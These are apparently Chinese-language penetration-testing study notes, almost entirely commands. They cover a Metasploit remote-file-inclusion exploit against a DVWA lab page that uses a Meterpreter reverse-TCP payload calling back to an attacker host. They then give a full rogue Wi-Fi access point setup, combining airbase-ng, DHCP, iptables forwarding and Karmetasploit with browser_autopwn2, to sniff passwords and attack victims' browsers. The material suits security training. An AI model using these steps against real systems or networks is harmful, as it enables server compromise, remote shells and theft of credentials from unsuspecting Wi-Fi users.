开启远程包含
vi /etc/php5/cgi/php.ini #php info
allow_url_fopen = On
allow_url_include = On
RFI 远程文件包含利用
use exploit/unix/webapp/php_include
set RHOST 1.1.1.2
set PATH /dvwa/vulnerabilities/fi/ 存在文件包含的路径
set PHPURI /?page=XXpathXX 存在文件包含的页面(XXpathXX自动替换)
指定头信息,带上cookie
set HEADERS "Cookie:security=low;
PHPSESSID=eefcf023ba61219d4745ad7487fe81d7"
设置payload
set payload php/meterpreter/reverse_tcp
set lhost 1.1.1.1
Karmetasploit 嗅探密码 截获数据 浏览器攻击
只是一个资源文件
先创造一个伪造AP
然后调用资源文件
基础架构配置 DHCP
apt-get install isc-dhcp-server
cat /etc/dhcp/dhcpd.conf
option domain-name-servers 10.0.0.1;
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
}
伪造AP
airmon-ng start wlan0 #启动侦听模式
airbase-ng -P -C 30 -e "FREE" -v wlan0mon
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
建立dhcp租约文件
touch /var/lib/dhcp/dhcpd.leases
启动dhcp服务
dhcpd -cf /etc/dhcp/dhcpd.conf at0
启动karmetasploit
msfconsole -q -r karma.rc_.txt
修改配置让受害者可以上网
vi karma.rc_.txt
删掉setg有关的参数
添加使用browser_autopwn2模块
检查恶意流量的模块
auxiliary/vsploit/malware/dns* 好几个模块,以dns开头的
Mariposa 僵尸程序,该模块来查看,流量的流向,是否有访问CC端
zeus 僵尸程序
启动路由,iptables转发规则
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE